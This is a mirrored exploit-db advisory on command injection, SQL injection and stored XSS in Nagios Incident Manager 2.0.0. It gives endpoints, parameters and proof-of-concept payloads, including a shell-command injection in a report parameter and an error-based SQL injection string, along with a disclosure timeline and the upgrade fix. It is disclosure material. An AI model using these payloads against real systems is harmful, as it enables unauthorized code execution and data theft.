bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/40252.txt
Offensive Security 29076928d8 DB: 2016-08-17 
10 new exploits

Mozilla Firefox 1.5.0.4 - (marquee) Denial of Service Exploit
Mozilla Firefox 1.5.0.4 - (marquee) Denial of Service

LifeType 1.0.4 - SQL Injection / Admin Credentials Disclosure Exploit
LifeType 1.0.4 - Multiple Vulnerabilities

Linux Kernel < 2.6.16.18 - (Netfilter NAT SNMP Module) Remote DoS Exploit
Linux Kernel < 2.6.16.18 - (Netfilter NAT SNMP Module) Remote Denial of Service
cms-bandits 2.5 - (spaw_root) Remote File Inclusion
Enterprise Payroll Systems 1.1 - (footer) Remote Include
CMS-Bandits 2.5 - (spaw_root) Remote File Inclusion
Enterprise Payroll Systems 1.1 - (footer) Remote File Inclusion
0verkill 0.16 - (ASCII-ART Game) Remote Integer Overflow Crash Exploit
empris r20020923 - (phormationdir) Remote Include
aePartner 0.8.3 - (dir[data]) Remote Include
0verkill 0.16 - (ASCII-ART Game) Remote Integer Overflow Crash PoC
empris r20020923 - (phormationdir) Remote File Inclusion
aePartner 0.8.3 - (dir[data]) Remote File Inclusion
SmartSiteCMS 1.0 - (root) Remote File Inclusion
Opera 9 - (long href) Remote Denial of Service Exploit
SmartSite CMS 1.0 - (root) Remote File Inclusion
Opera 9 - (long href) Remote Denial of Service

w-Agora 4.2.0 - (inc_dir) Remote File Inclusion Exploit
w-Agora 4.2.0 - (inc_dir) Remote File Inclusion

BitchX 1.1-final do_hook() Remote Denial of Service Exploit
BitchX 1.1-final - do_hook() Remote Denial of Service

BLOG:CMS 4.0.0k SQL Injection Exploit
BLOG:CMS 4.0.0k - SQL Injection

Sun Board 1.00.00 alpha Remote File Inclusion
Sun Board 1.00.00 alpha - Remote File Inclusion

Mailist 3.0 Insecure Backup/Local File Inclusion
Mailist 3.0 - Insecure Backup/Local File Inclusion

AdaptCMS 2.0.0 Beta (init.php) Remote File Inclusion
AdaptCMS 2.0.0 Beta - (init.php) Remote File Inclusion
VisualShapers ezContents 1.x/2.0 db.php Arbitrary File Inclusion
VisualShapers ezContents 1.x/2.0 archivednews.php Arbitrary File Inclusion
VisualShapers ezContents 1.x/2.0 - db.php Arbitrary File Inclusion
VisualShapers ezContents 1.x/2.0 - archivednews.php Arbitrary File Inclusion

VoteBox 2.0 Votebox.php Remote File Inclusion
VoteBox 2.0 - Votebox.php Remote File Inclusion

TRG News 3.0 Script Remote File Inclusion
TRG News 3.0 Script - Remote File Inclusion

Vortex Portal 2.0 content.php act Parameter Remote File Inclusion
Vortex Portal 2.0 - content.php act Parameter Remote File Inclusion

Shoutbox 1.0 Shoutbox.php Remote File Inclusion
Shoutbox 1.0 - Shoutbox.php Remote File Inclusion

Ajaxmint Gallery 1.0 Local File Inclusion
Ajaxmint Gallery 1.0 - Local File Inclusion
Zabbix 2.2.x_ 3.0.x - SQL Injection
Microsoft Office Word 2013_2016 - sprmSdyaTop Denial of Service (MS16-099)
Zabbix 2.2.x / 3.0.x - SQL Injection
Microsoft Office Word 2013/2016 - sprmSdyaTop Denial of Service (MS16-099)
Google Chrome 26.0.1410.43 (Webkit) - OBJECT Element Use After Free PoC
Windows x86 - MessageBoxA Shellcode (242 bytes)
Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes)
Lepton CMS 2.2.0 / 2.2.1 - Directory Traversal
Lepton CMS 2.2.0 / 2.2.1 - PHP Code Injection
Pi-Hole Web Interface 2.8.1 - Stored XSS in Whitelist/Blacklist
Nagios Log Server 1.4.1 - Multiple Vulnerabilities
Nagios Network Analyzer 2.2.0 - Multiple Vulnerabilities
Nagios Incident Manager 2.0.0 - Multiple Vulnerabilities
Internet Explorer - MSHTML!CMultiReadStreamLifetimeManager::ReleaseThreadStateInternal Read AV
2016-08-17 05:02:47 +00:00

124 lines
No EOL
4.2 KiB
Text
Executable file
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

( , ) (,
. '.' ) ('. ',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
Nagios Incident Manager Multiple Vulnerabilities
Affected versions: Nagios Incident Manager <= 2.0.0
PDF:
http://www.security-assessment.com/files/documents/advisory/NagiosIncidentManager.pdf
+-----------+
|Description|
+-----------+
The Nagios Incident Manager application is vulnerable to multiple
vulnerabilities, including remote code execution via command injection,
SQL injection and stored cross-site scripting.
+------------+
|Exploitation|
+------------+
==Command Injection==
Multiple command injection vulnerabilities exist within the incident
report file generation functionality as user input is passed to system
shell calls without validation. A limited non-administrative user, who
by default does not have permissions to add custom MIME types for
incident file attachments, can exploit these vulnerabilities to obtain
remote code execution on the Incident Manager system as the apache user.
URL => /nagiosim/reports/download/<pdf|jpg>/mttr/<BASE64 PAYLOAD>
Method => GET
POC Payload => start_date=2016-05-06&end_date=2016-05-06&types[]=2"
"";{touch,/tmp/MYFILE};echo
URL => /nagiosim/reports/download/<pdf|jpg>/closed/<BASE64 PAYLOAD>
Method => GET
POC Payload => start_date=2016-05-06&end_date=2016-05-06&types[]=2"
"";{touch,/tmp/MYFILE};echo
URL => /nagiosim/reports/download/<pdf|jpg>/first_response/<BASE64 PAYLOAD>
Method => GET
POC Payload => start_date=2016-05-06&end_date=2016-05-06&types[]=2"
"";{touch,/tmp/MYFILE};echo
URL => /nagiosim/reports/download/<pdf|jpg>/general/<BASE64 PAYLOAD>
Method => GET
POC Payload => start_date=2016-05-06&end_date=2016-05-06&types[]=2"
"";{touch,/tmp/MYFILE};echo
==SQL Injection==
The Nagios IM admin functionality to update the application settings is
vulnerable to an SQL Injection vulnerability via error-based payloads.
An attacker can inject into the timezone POST parameter and retrieve
sensitive information from the application MySQL database.
URL => /nagiosim/admin/settings
Method => POST
Parameter => timezone
Payload => Pacific/Samoa' AND (SELECT 5323 FROM(SELECT
COUNT(*),CONCAT(0x717a7a7171,(MID((IFNULL(CAST(DATABASE() AS
CHAR),0x20)),1,54)),0x7170786a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '
==Stored Cross-Site Scripting==
Multiple stored cross-scripting vulnerabilities exist in the Nagios IM
web interface, allowing a standard user to insert malicious JavaScript
payloads into administrative and non-administrative application
functionality. This attack vector could be used by an authenticated
attacker with standard user privileges to hijack the session of an admin
user and extend their permissions within the application (e.g. adding
PHP as a valid MIME type for file attachments).
URL => /nagiosim/incidents/add
Method => POST
Parameters => title, summary, priority, file_description, status
Render => /nagiosim/incidents, /nagiosim/incidents/details/<ID>
POC Payload => <script>alert(1)</script>
URL => /nagiosim/api/incidents/<ID>/messages
Method => POST
Parameters => title
Render => /nagiosim/incidents/details/<ID>
POC Payload => <script>alert(1)</script>
URL => /nagiosim/profile
Method => POST
Parameters => username, first_name, last_name
Render => /nagiosim/admin/users, Global Menu Banner (username)
POC Payload => <script>alert(1)</script>
+----------+
| Solution |
+----------+
Upgrade to Nagios Incident Manager 2.0.1
+------------+
| Timeline |
+------------+
2/06/2016 - Initial disclosure to vendor
3/06/2016 - Vendor acknowledges receipt of advisory
8/07/2016 - Vendor releases patched software version (2.0.1)
11/08/2016 Public disclosure
+------------+
| Additional |
+------------+
Further information is available in the accompanying PDF.
http://www.security-assessment.com/files/documents/advisory/NagiosIncidentManager.pdf
Reference in a new issue View git blame Copy permalink